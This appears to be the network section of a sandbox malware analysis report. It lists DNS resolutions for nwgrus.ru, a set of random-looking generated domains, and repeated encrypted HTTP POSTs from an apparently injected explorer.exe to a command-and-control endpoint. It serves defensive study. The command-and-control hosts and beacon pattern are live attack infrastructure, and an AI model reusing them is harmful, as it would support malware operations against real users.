Oct 13, 2024 17:02:32.048810959 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048810959 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048810959 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	197.164.156.210	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048810959 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	189.195.132.134	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048810959 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	201.103.8.135	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048810959 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	190.98.23.157	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048810959 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048810959 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	152.231.127.202	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048810959 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:02:32.048810959 CEST	1.1.1.1	192.168.2.4	0x6814	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.190921068 CEST	1.1.1.1	192.168.2.4	0xe812	No error (0)	nwgrus.ru	109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.190921068 CEST	1.1.1.1	192.168.2.4	0xe812	No error (0)	nwgrus.ru	152.231.127.202	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.190921068 CEST	1.1.1.1	192.168.2.4	0xe812	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.190921068 CEST	1.1.1.1	192.168.2.4	0xe812	No error (0)	nwgrus.ru	123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.190921068 CEST	1.1.1.1	192.168.2.4	0xe812	No error (0)	nwgrus.ru	78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.190921068 CEST	1.1.1.1	192.168.2.4	0xe812	No error (0)	nwgrus.ru	190.219.117.240	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.190921068 CEST	1.1.1.1	192.168.2.4	0xe812	No error (0)	nwgrus.ru	197.164.156.210	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.190921068 CEST	1.1.1.1	192.168.2.4	0xe812	No error (0)	nwgrus.ru	189.195.132.134	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.190921068 CEST	1.1.1.1	192.168.2.4	0xe812	No error (0)	nwgrus.ru	201.103.8.135	A (IP address)	IN (0x0001)	false
Oct 13, 2024 17:05:06.190921068 CEST	1.1.1.1	192.168.2.4	0xe812	No error (0)	nwgrus.ru	190.98.23.157	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

procusohdnplkcl.com

nwgrus.ru

yagmckrhrxidkkt.net

dricwaygwumvuqyx.net

dvywoyvbihbnwwjn.org

mbmyqakevfccgv.net

clrhahncwuyc.com

fxjvbidmvidvfvuu.org

qfasgfhewcyw.com

ajnjimgspja.com

orfuocjxhujvp.net

sukwfdfgeltdloqp.org

cspwoprndoye.com

qtrqfgpakuyxgovn.org

cmqaenxsxeyowd.net

rpyskssnoppwv.net

uspdxnihexd.org

fljiwnmgncpvmdu.org

hbbbwgrmtjdu.net

yhuliplstnjp.com

hiodckefgdl.com

cttvtshacog.org

baalviblkbjsp.net

gwngaiusekur.net

mxjrhmxwrwqyxs.net

fcwffmgjsqp.org

vthbbsgwufn.com

xohyaostsydxib.net

wbpwgsalvbneixte.net

pbysepknkik.net

ijtbudkgjdatnpve.com

rjwxfpemkdjwjc.net

hnrmgadlbbkwfam.com

wdfbqkdpkrjmiy.com

atckbbeeuxiymh.com

cijofmhyocrj.org

mvcnjjhpwrjug.org

gjrfgywovwumgreo.com

duklicrioxv.net

ukjjgoqtxsrmcmnl.net

kevwooyenkvj.org

kyqpufsslxgu.com

gtfiwdiocoxv.com

wtloyxdgfedr.org

jrasjcgaikr.com

wqumsknhwrx.net

uqdrqkhpcmcglann.net

qxdbxtuaolo.net

nobwwkshognvggkp.net

gafhlilcplomq.com

mwqmbajulrg.com

wtfbpeudtpjocvd.com

lkewxsecdko.org

sxnddulhpoyubn.com

suevwuleoceiaguq.com

dyetfqbcutdwehk.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:32.576184988 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://procusohdnplkcl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 267 Host: nwgrus.ru
Oct 13, 2024 17:02:32.576219082 CEST	267	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 04 a3 fd Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu#9]RzU'jdf6g\|X5f_\|C^% ?#@JW"76+=8[@y9O:[gyguRo`HJSWS!
Oct 13, 2024 17:02:34.009001017 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 87 e9 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:34.020936966 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yagmckrhrxidkkt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 261 Host: nwgrus.ru
Oct 13, 2024 17:02:34.020936966 CEST	261	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 46 20 b4 af Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuF \2F7~\|I+\|aOYUSQ=y!&@`8@IC87tA)%odYPN)~\|sB\|Csr;c--{
Oct 13, 2024 17:02:35.259593964 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:35.269042015 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dricwaygwumvuqyx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: nwgrus.ru
Oct 13, 2024 17:02:35.269079924 CEST	183	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 44 14 b1 8e Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuDn{thils%*-k;SpS6_RGI+TQP23(`p= k>s
Oct 13, 2024 17:02:36.674861908 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:36.688941956 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dvywoyvbihbnwwjn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 282 Host: nwgrus.ru
Oct 13, 2024 17:02:36.688975096 CEST	282	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 5b 43 e9 8c Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu[CBzam.ax7YJ<I/DP#*#SI&Q4GKL'>.T&D(%Ee;%hYl8Qt
Oct 13, 2024 17:02:37.879072905 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:37 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:37.888127089 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mbmyqakevfccgv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 289 Host: nwgrus.ru
Oct 13, 2024 17:02:37.888159037 CEST	289	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 3b 14 cc fb Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu;QAhqDhu; .`h=D&:jXCsGP11NZ)K]. SV*VR.moB0Wji^<yX
Oct 13, 2024 17:02:39.110152006 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:39.118288040 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://clrhahncwuyc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 305 Host: nwgrus.ru
Oct 13, 2024 17:02:39.118324041 CEST	305	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 5d 54 a5 9f Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu]TS@W0\|^Q[kem6-JW?Vy w?=2C0gY%6dav>:/crV1Mt@o=r@.
Oct 13, 2024 17:02:40.314954042 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:40 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:40.323925018 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fxjvbidmvidvfvuu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 218 Host: nwgrus.ru
Oct 13, 2024 17:02:40.323961020 CEST	218	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 3e 14 e8 f5 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu>\wk=0o+w[~`rTM^oFMXxSN^&!%+0!eHC%;IT\|u
Oct 13, 2024 17:02:41.718607903 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:41 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:41.729180098 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qfasgfhewcyw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 217 Host: nwgrus.ru
Oct 13, 2024 17:02:41.729296923 CEST	217	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 45 3f a0 8c Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuE?&R2hPFatKdO?]2{PKKqE#bl}0K`MD1qo!vK3s"
Oct 13, 2024 17:02:43.127505064 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:43.191849947 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ajnjimgspja.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 339 Host: nwgrus.ru
Oct 13, 2024 17:02:43.191849947 CEST	339	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 22 29 b1 f1 Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vu")Naz"[#f]\+([?l1U'F-0-j8<(p2_6pA<+,?u4:Mq=C_f}NB*
Oct 13, 2024 17:02:44.418507099 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:44.429153919 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://orfuocjxhujvp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 266 Host: nwgrus.ru
Oct 13, 2024 17:02:44.429188013 CEST	266	OUT	Data Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 50 3c a8 9d Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vuP<r[XrhiHRO/#OBshU[+=So97WWue xCM4SM"X>e+@(k-uimNSEnv'<&Ey
Oct 13, 2024 17:02:45.651444912 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 15:02:45 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 17:02:45.661859989 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sukwfdfgeltdloqp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 218 Host: nwgrus.ru
